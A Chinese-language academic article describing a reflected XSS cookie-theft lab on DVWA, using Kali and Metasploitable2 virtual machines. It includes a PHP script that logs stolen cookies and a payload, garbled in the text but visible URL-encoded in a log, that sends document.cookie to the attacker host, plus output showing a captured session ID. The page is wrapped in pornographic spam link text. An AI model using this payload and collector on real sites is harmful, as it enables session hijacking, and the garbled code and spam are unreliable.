999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

基于DVWA下XSS跨站腳本攻擊原理與實踐

2018-05-14 09:06:16余立強
絲路視野 2018年29期

【摘要】分析反射型跨站腳本攻擊的原理,在VMWare虛擬機軟件中建立由Metasploitable2、Kali和Windows等組成的虛擬機局域網(wǎng),配置虛擬機網(wǎng)絡,調(diào)試好DVWA網(wǎng)站平臺,建立WEB服務,編寫獲取cookie值的PHP程序,編寫JavaScript惡意腳本,較好地達到了實踐操作的效果。

【關鍵詞】DVWA;XSS;跨站腳本;cookie;VMWare

XSS攻擊即為跨站腳本攻擊,英文為CrossSiteScripting,為不和層疊樣式表(CascadingStyleSheets,CSS)的縮寫混淆,故將跨站腳本攻擊縮寫為XSS。這是當前一種非常重要的攻擊方式,其危害主要體現(xiàn)在以下幾個方面:盜取用戶cookie;修改網(wǎng)頁內(nèi)容;網(wǎng)站掛馬;利用網(wǎng)站重定向;XSS蠕蟲等。

XSS攻擊分為反射型(XSSreflected)、存儲型(XSS stored)及本地利用漏洞型三種類型,這里僅介紹反射型跨站腳本攻擊的原理與實踐操作。

一、XSS跨站腳本攻擊原理

利用DVWA平臺進行XSS跨站腳本攻擊的原理示意如圖1所示。

在圖1中,攻擊者在有XSS漏洞的網(wǎng)站中將網(wǎng)頁嵌入惡意腳本,如用JavaScript編寫的惡意代碼,當被攻擊用戶使用瀏覽器瀏覽點擊被嵌入惡意代碼網(wǎng)頁中的鏈接時,惡意代碼將會在用戶的瀏覽器上執(zhí)行,將被攻擊用戶的信息如Cookie值傳輸給攻擊者(黑客)。攻擊者獲取到被攻擊用戶的Cookie值后繞過賬號及密碼的輸入驗證,直接登錄到用戶的網(wǎng)站,獲取更有價值的信息。從而實現(xiàn)了跨過有XSS漏洞的網(wǎng)站對被攻擊用戶進行攻擊。因此,XSS跨站腳本攻擊與文件包含、命令執(zhí)行、SQL注入等針對服務器端的攻擊方式有很大差異,更具有隱蔽性和破壞性。

二、XSS跨站腳本攻擊模擬環(huán)境拓撲結構

構建XSS跨站腳本攻擊模擬環(huán)境的拓撲結構如圖2所示。

宿主機一般為Windows7/10系統(tǒng)的PC機,安裝VMWareWorkstation10.0以上版本軟件;有跨站漏洞的網(wǎng)站由Metasploitable2虛擬機中的DVWA平臺擔承;攻擊機是Kali虛擬機集成攻擊工具;客戶機是Windows7系統(tǒng)。這些虛擬機由VMWare虛擬網(wǎng)絡構成星形拓撲結構的以太局域網(wǎng)。

三、模擬環(huán)境中虛擬機網(wǎng)絡配置

(一)虛擬機的網(wǎng)絡配置

在圖2所示的拓撲結構中,各虛擬機的網(wǎng)絡連接模式及IP地址分配按表1設置。

表1中的IP地址可以自己規(guī)劃??紤]到宿主機通常要連接到外部網(wǎng)絡并與內(nèi)部虛擬機網(wǎng)絡的連通,因此,在VMWare中對各虛擬機選擇“僅主機”或“NAT”模式連接,使本環(huán)境中的虛擬機不暴露在外網(wǎng)易受攻擊的網(wǎng)絡中,保護宿主機的安全。

(二)VMWare虛擬機平臺軟件設置

在VMWareWorkstation10以上的軟件版本上,修改VMWare的網(wǎng)絡連接編輯配置,操作如下。

(1)點擊VMWare軟件菜單“編輯”,選擇“虛擬網(wǎng)絡編輯器”,進入如圖3所示的窗口。

(2)點擊VMnet1(僅主機模式),其配置按圖3設置。

(三)網(wǎng)絡連通性測試

經(jīng)過上述配置后,分別進入三臺虛擬機,進行網(wǎng)絡連通性測試。

(1)三臺虛擬機間能相互ping通。

(2)宿主機ping通各虛擬機。

(3)虛擬機ping不通宿主機。

四、XSS跨站腳本攻擊前的準備工作

(一)調(diào)試有XSS漏洞的DVWA網(wǎng)站

!.調(diào)試"#$%網(wǎng)站平臺

進入&()*+,-.()/,0虛擬機,核查12地址,輸入命令:3.+ )445

在被攻擊用戶中打開16瀏覽器,在地址欄中輸入:7((+8 99!:0.;<.0.0==9

顯示&()*+,-.()/,0頁面,其中有"#$%的鏈接,點擊之>即可進入"#$%網(wǎng)站的界面。如果不能顯示相關的頁面,請檢查網(wǎng)絡配置。

0.編寫?)@)AB5.+(惡意代碼

可將?)@)AB5.+(的惡意代碼以文本文件C)@)*B5.+(.(D(保存在宿主機中>其:

E *B5.+( F 4-BGHI(.J5.( K LE .HM*5B N O 7((+8 99?。?.;<.0.0!P9)BB+(Q B--R..+7+S B--R.NL T4-BGHI(.B--R. TL O J.4(7N= 7.M7(N= /-545N= 9FL U V ),5( K 9WAA9 U E9*B5.+(F

(二)Kali攻擊機

攻擊機是Kali2016,并利用其中的LAMP(apache2、MySQL、PHP服務)平臺環(huán)境用來接收被害者的cookie值。

1.啟動apache2服務

啟動apache2服務,輸入命令:#serviceapache2start

2.瀏覽驗證apache2的默認主頁

在被攻擊用戶中打開IE瀏覽器,地址欄處輸入:http://172.49.2.216,顯示apache2的默認頁面。

3.編輯accept_cookie.php程序代碼

在Kali2016集成工具中安裝有PHP程序驅(qū)動模塊,能夠解釋PHP程序的執(zhí)行。因此,要在Kali2016的apache2默認主頁的子目錄/var/www/html/中編輯accept_cookie.php程序:

#vi/var/www/html/accept_cookie.php

<?php

date_default_timezone_set('Asia/Shanghai');

$cookie=$_GET['cookie'];//GETcookie

$ip=getenv('REMOTE_ADDR');//RemoteIP

$time=date('Y-m-dg:i:s');//

$referer=getenv('HTTP_REFERER');//refer

$agent=$_SERVER['HTTP_USER_AGENT'];//AGENT

$fp=fopen('/tmp/cookie.txt','a');//..cookie.txt

fwrite($fp,IP:.$ip.\nDateandTime:.$time.\nUserAgent:.$agent.\nReferer:.$referer.\nCookie:.$cookie.\n\n\n);//

fclose($fp);//

?>

保存退出。

accept_cookie.php程序由上述JavaScript腳本調(diào)用執(zhí)行。其功能是將被害人的cookie值保存到Kali2016的子目錄/tmp中,文件名為cookie.txt。

請注意子目錄/tmp的權限屬性為:

drwxrwxrwx12rootroot4096Nov1012:29tmp

即其它用戶要有“寫”的權限,否則,cookie.txt文件不能被寫入/tmp目錄中。當然,也可以指定其它子目錄存放cookie.txt,只需該子目錄對其它用戶開放寫的權限。

五、XSS跨站腳本攻擊

在上述準備工作后,可以隨時實施XSS攻擊,其攻擊過程如下:

(1)在被攻擊用戶中打開IE瀏覽器,在地址欄中輸入:http://172.49.2.200/

(2)在Metasploitable2頁面中點擊DVWA鏈接,進入DVWA網(wǎng)站平臺;

(3)輸入賬號:admin;密碼:password

(4)登錄成功后,在左側欄中選擇:DVWAsecurity,并在右側窗口選擇安全等級為:low,并點擊“Submit”提交;

(5)繼續(xù)在左側欄中選擇:XSSreflected;在右側窗口的文本窗口中復制粘貼前述的“JavaScript的惡意代碼”,點擊“Submit”提交,有彈出窗口顯示“/XSS”,如圖4所示。

(6)在攻擊機上輸入命令:

#ls-l/tmp

#cat/tmp/cookie.txt

顯示:IP:172.49.2.7

DateandTime:2018-11-1112:21:06

UserAgent:Mozilla/4.0(compatible;MSIE8.0;Windows NT6.1;WOW64;Trident/4.0;SLCC2;.NETCLR2.0.50727;.NETCLR3.5.30729;.NETCLR3.0.30729;MediaCenterPC 6.0)

Referer:

http://172.49.2.200/dvwa/vulnerabilities/XSS_r/?name=%3Cscript%3Edocument.write%28%27%3Cimg+src% 3D%22http%3A%2F%2F172.49.2.216%2Faccept_cookie.php%3Fcookie%3D%27%2Bdocument.cookie%2B% 27%22width%3D0+height%3D0+border%3D0+%2F%3E% 27%29%3Balert%28%2FXSS%2F%29%3C%2Fscript%3E+

Cookie:security=low;

PHPSESSID=477dad0e5bc889a6bd98e9727816ad25

從上面的顯示中看到了被攻擊用戶的cookie值:477dad0e5bc889a6bd98e9727816ad25

至此,攻擊者就可以利用cookie值冒充被攻擊用戶登錄到網(wǎng)站中獲取其個人隱私信息。關于cookie值的利用請參考其它相關資料。

六、結語

由于XSS是針對客戶端瀏覽器的攻擊,而目前的很多瀏覽器都已經(jīng)自帶了XSS防御功能,因而建議被攻擊用戶的系統(tǒng)可采用windows7/XP/2003虛擬機,通過IE8/IE6瀏覽器去訪問DVWA,這樣能順利地獲得攻擊實踐操作的效果。

參考文獻

[1]felix.手把手教你如何搭建自己的滲透測試環(huán)境[EB/OL]. 2016-04-27:http://www.freebuf.com/sectool/102661.html.

[2]謝文東的圍脖.Metasploitable2使用指南[EB/OL].2014-05-18:https://www.freebuf.com/articles/system/34571.html.

[3]百度經(jīng)驗.如何安裝全新的KaliLinux系統(tǒng)[EB/OL].:https://jingyan.baidu.com/article/ca2d939d62f4eaeb6c31ce 0f.html.

[4]Nightsay.【XSS】dvwa平臺下的實戰(zhàn)[EB/OL].2015-05-19:https://blog.csdn.net/Nightsay/article/details/45833353.

[5]百度百科.XSS攻擊[EB/OL].2018-06-16:https://baike. baidu.com/item/XSS攻擊/954065?fr=aladdin.

作者簡介:余立強(1960—),男,江蘇無錫人,無錫商業(yè)職業(yè)技術學院物聯(lián)網(wǎng)技術學院,高級工程師,研究方向:計算機網(wǎng)絡安全與云計算。

主站蜘蛛池模板: 久久久噜噜噜久久中文字幕色伊伊| 免费a级毛片视频| 精品国产三级在线观看| 日本高清免费不卡视频| 99精品国产高清一区二区| 亚洲天堂视频网站| 国内精品一区二区在线观看| 在线观看的黄网| 久久午夜影院| 欧美精品成人一区二区在线观看| 成人精品在线观看| 2022国产91精品久久久久久| 亚洲综合精品第一页| 福利片91| 欧美日韩免费| 精品国产网站| 亚洲人免费视频| 欧美在线综合视频| 天天做天天爱天天爽综合区| 亚洲性影院| 亚洲天堂免费观看| 国产性生大片免费观看性欧美| a毛片免费看| 区国产精品搜索视频| 3344在线观看无码| 亚洲AV无码乱码在线观看代蜜桃 | 国产成人a在线观看视频| 亚洲无码37.| 精品乱码久久久久久久| 国产白浆视频| 女人18毛片一级毛片在线| 免费午夜无码18禁无码影院| 黄色在线不卡| 野花国产精品入口| 欧美激情成人网| 毛片一区二区在线看| 欧美激情视频一区二区三区免费| 99久久精品视香蕉蕉| 国产无遮挡猛进猛出免费软件| 99无码中文字幕视频| 激情爆乳一区二区| 国产成人AV综合久久| 中文字幕第1页在线播| 国产在线观看99| 美女亚洲一区| 91精品视频在线播放| 国产精品香蕉| 亚洲三级网站| 国产成人无码Av在线播放无广告| 国产精品美女免费视频大全| 在线观看无码av五月花| 国内精品91| 成人亚洲天堂| 麻豆国产在线不卡一区二区| 免费午夜无码18禁无码影院| 国产成人1024精品下载| 国产AV无码专区亚洲A∨毛片| 福利在线不卡| 国产精品香蕉在线| 在线精品视频成人网| 亚洲精品自在线拍| 久久精品亚洲中文字幕乱码| 波多野结衣视频一区二区| 国产日韩欧美精品区性色| 91成人在线观看| 国产成人精品亚洲日本对白优播| 久久国产av麻豆| 国内精品久久久久鸭| 国产精品成人不卡在线观看| 国产无吗一区二区三区在线欢| 国产在线观看一区精品| 97久久超碰极品视觉盛宴| 亚洲无码高清一区二区| 91在线激情在线观看| 国内精品伊人久久久久7777人 | 亚洲免费福利视频| 蜜桃臀无码内射一区二区三区| 国产成人麻豆精品| 亚洲欧美不卡中文字幕| 免费看一级毛片波多结衣| 91探花国产综合在线精品| 秋霞午夜国产精品成人片|